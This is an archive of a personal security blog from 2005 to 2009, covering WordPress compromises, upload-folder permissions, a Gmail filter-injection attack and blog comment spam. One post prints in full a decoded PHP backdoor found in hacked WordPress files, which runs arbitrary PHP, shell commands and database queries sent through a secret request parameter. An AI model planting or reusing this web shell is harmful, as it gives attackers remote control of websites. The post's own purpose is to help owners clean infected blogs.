security blog » blogging/blog hack

Server at Magic Requires Username Password

elamb.security — Sat, 08 Aug 2009 05:32:08 +0000

The Wordpress “Magic” hack!

If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.

Wordpress Magic Attack

Wordpress user Yokima reported this very slick hack.

FIX ACTION:
And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:

{


if (!function_exists('______safeshell'))
{
function ______safeshell($komut) {
@ini_restore("safe_mode");
@ini_restore("open_basedir");
$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
if (!empty ($komut)) {
if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
//@ ob_start();
@ passthru($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('system') && !in_array('system', $disable_functions)) {
//@ ob_start();
@ system($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
$res = @ shell_exec($komut);
echo $res;
}
elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
@ exec($komut, $res);
$res = join("\n", $res);
echo $res, "\n";
}
elseif (@ is_resource($f = @ popen($komut, "r"))) {
//$res = "";
while (!@ feof($f)) {
//$res .= @ fread($f, 1024);
echo(@ fread($f, 1024));
}
@ pclose($f);
}
else
{
$res = {$komut};
echo $res;
}
}
}
};
if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {
echo "
\n";
if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {
eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {
______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {
$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
if (!$result)
{
echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
die();
}
else if (is_resource($result))
{
$res = array();
while ($row = mysql_fetch_assoc($result))
{
$res[] = $row;
};
mysql_free_result($result);
echo serialize($res);
die();
}
else
{
echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
die();
}
};
echo "\n\n";
die();
};

};

p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.

Unable to create directory-parent directory writable? wordpress 2.7

elamb.security — Sun, 28 Jun 2009 15:33:18 +0000

I was having uploading images on one of my Wordpress 2.7 & 2.8 blogs. It gave me the following error:
Unable to create directory /home/username/server/wp-content/uploads/20XX/MM/ Is it parent directory writable by the server?

After a long time searching I found this solution from http://www.cyriac.me

Step 1: Log into your admin panel

Step 2: Go to Settings>>Miscellaneous

You will see two options,

Store uploads in this folder
Full URL path to files
Most probably you will see

/home/.boogee/XXXXX/XXXXXXX/wp-content/uploads

in the first field.

Step 3: Edit that to just

wp-contents/uploads

Some people were suggesting that you solve the problem my making the folders permissions 777, meaning anyone can do anything to that particular folder. As a security guy, I knew this was a bad idea (and it also did work for me ). I kept searching and ran into that solution.

Worked like a charm! thanks cyriac for putting solution on the blog.

More GMAIL Problems

elamb.security — Sat, 22 Nov 2008 19:03:59 +0000

This was news I could not ignore because I really, really like Gmail. These hacks are ridiculous. I hope that google is getting a handle on this. It looks like the accounts are getting hacked with some sort of script that runs from a site or email while gmail is opened:

According to David Airey & gnucitizen.org:
The victim visits a page while being logged into GMail. Upon execution, the page performs a multipart/form-data POST to one of the GMail interfaces and injects a filter into the victim’s filter list. In the example above, the attacker writes a filter, which simply looks for emails with attachments and forward them to an email of their choice. This filter will automatically transfer all emails matching the rule. Keep in mind that future emails will be forwarded as well. The attack will remain present for as long as the victim has the filter within their filter list, even if the initial vulnerability, which was the cause of the injection, is fixed by Google.
– gnucitizen

As many of you already know on November 2nd, MakeUseOf.com’s domain was stolen from us. It took us about 36 hours to get the domain back. As we have pointed out earlier the hacker somehow managed to get access to my Gmail account and from there to our GoDaddy account, unlock the domain and move it to another registrar.

You can see the whole story on our temporary blog makeuseof-temporary.blogspot.com/

I wasn’t planning to publish anything about the incident or cracker (person who steals domains) and how he managed to pull it off unless I was completely sure about it myself. I had a good feeling it was a Gmail security flaw but wanted to confirm it before posting anything about it on MakeUseOf. We love Gmail and giving them bad publicity is not something we would ever want to do.

Now the thing is the domain name domainsgames.org is protected by Moniker and they hide all the contact info for it.

Domain ID:D154519952-LROR
Domain Name:DOMAINSGAME.ORG
Created On:22-Oct-2008 07:35:56 UTC
Last Updated On:08-Nov-2008 12:11:53 UTC
Expiration Date:22-Oct-2009 07:35:56 UTC
Sponsoring Registrar:Moniker Online Services Inc. (R145-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:MONIKER1571241
.
.
.
.
Name Server:NS3.DOMAINSERVICE.COM
Name Server:NS2.DOMAINSERVICE.COM
Name Server:NS1.DOMAINSERVICE.COM
Name Server:NS4.DOMAINSERVICE.COM

More at Makeusof.com

The Google Fix

Ahmadinejad’s blog hacked and defaced

elamb — Wed, 24 Jan 2007 15:33:14 +0000

“Iranian President Mahmoud Ahmadinejad’s Blog we dealt with last week”

Ahmadinejad has a blog?! I wonder who else within the “axis of evil” has blogs. Chavez? Kim Jong Il?

read more | digg story

Analyzing 20,000 MySpace Passwords

elamb — Mon, 18 Sep 2006 15:09:15 +0000

In a day where browsers are coming out with anti-phising tactics, I can not believe how many people still fall for phising. It’s all over the news, and most email clients display warnings. So when I got an email from “Admin@MySpace.com” I kind of chuckled.

I have a friend who is constantly getting her MySpace account hacked. There seem to be lots of security issues in MySpace.

read more | digg story

Why Subdomain Hosting is Bad

elamb — Thu, 20 Jul 2006 21:27:28 +0000

“A quick look at why offering non-reseller subdomain hosting is a bad idea and can expose your passwords to malicious hostees.”

I’m glad I stubbled across this. I was going to host on Wordpress Mu, but now I think I’ll stick with Blogware until I can lock down WPMU. Wordpress is a superior product (more intuitive, better SEO design ect) But WPMU is just too new. I don’t feel comfortable having a buch of customers on such a shake, new system. I will likely host my own set of blogs on it until all the major bugs are worked out.

read more | digg story

Dvorak's Blog Spam Fix

elamb.security — Tue, 27 Sep 2005 03:11:07 +0000

Dvorak gets no spam, now he gets no blog spam.

But my spam problems have just begun:
I started getting nailed with casino, porn and commercial site spam. They trackback promoting Disney Trips, penis enlargements or, my favorite, Texas Holdem. I still get a few spam links about every few weeks or so. And I'm currently getting and giving traffic to a casino site.. and I haven't figured out how that is happening. I'm sure these bastards are usings some kind of software to locate vulnerable (anonymous accepting) blogs and nuke them. I've had to terminate my anonymous comments and I'm thinking of shutting down my Trackbacks. I also blocked a few repeat offenders. For me, that is unfortunate because the interaction (free comments, links to and from relevant sites of many different oppinions) is the coolest thing about blogs. Blog innocence has come and gone over night.

Appearently, Marc Perkel at ctyme.com has found a way to get rid of all spam providing you are using apache and on word press.

He does it with this code:

< location /blog/wp-comments-newpost.php >
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^.*dvorak.org/.*
RewriteRule ^.* http://www.ctyme.com/comment-spam.html
< /location >

read more | digg story

Comment Spammers Exploiting Open blogs

elamb.security — Tue, 16 Aug 2005 10:53:31 +0000

I've recently experienced an increase in spam traffic on my blog.
It started when I got about 20 comments in one day on one of my least
popular articles. I could see that the porn spammer had dug deep
into my site and found a seemingly insignifigant article to place about
100 links. I deleted them imediately and blocked the IP from
whince they came.

The very next day I had fifteen more. I delete those and blocked
that IP. I've been forced to turn off my anonymous
comments. One of my favorite things about blogs is that anyone
can say anything – they so refreshingly interactive that they create
these close relationships with readers.

Unfortunately, casino, porn and pill spammers also see the power of
blogs. They target blogs with anonymous comments and
trackbacks. And they use thousands of hacked computers to act as
proxies so that even if you block their IP they've got plenty more ways
to get to you.

I've blocked them and I'm still seeing traffic coming from their sites
which tells me that they have linked to my site and my visitors are
clicking into their site then coming back to me.

Here is a list of Casino Spammers retreived from Netaloid.com

“Finding our Poker Spammer’s identifying links is easy. Just
visit one of his web pages by using one of the thousands of spam links
he left on your site. Like poker.terashells.com, for instance. Then
click on the links to the casino sites. You’ll see something like (or
identical to) this:”

http://www.pacificpoker.com/default.htm?sr=904970&flag=0002

http://www.partypoker.com/index20100.htm?wm=2445773

http://www.empirepoker.com/index.htm?wm=2170658

http://banner.casinolasvegas.com/cgi-bin/redir.cgi?id=N&member=onlinecas&profile=lv2m

http://www.888.com/default.htm?sr=611794&flag=0002

http://www.starluckcasino.com/slcasino/links/56296.html

http://www.aceclub.com/aceclub/links/1790.html

http://www.reefclubcasino.com/default.htm?sr=806320&flag=0002

For more on legally stopping Casino, Porn and other spammers visit:

http://www.thepetitionsite.com/takeaction/353566831?ltl=1124161500

http://www.theregister.co.uk/2005/01/31/link_spamer_interview/

Google Hacking Explained

elamb.security — Tue, 19 Jul 2005 19:47:31 +0000

What is Google hacking? How is Google used by hackers as a tool? Read this article for more information.

Johny Long, author of the official Google Hacking book will be at the Las Vegas, NV Defcon 13 Convention signing books.

read more | digg story

Absolutely Del.icio.us – Complete Tool Collection

elamb.security — Tue, 28 Jun 2005 04:11:50 +0000

del.icio.us is a very popular social bookmarks manager. This is possibly the largest collection of tools related to del.icio.us and is constantly updated.

read more | digg story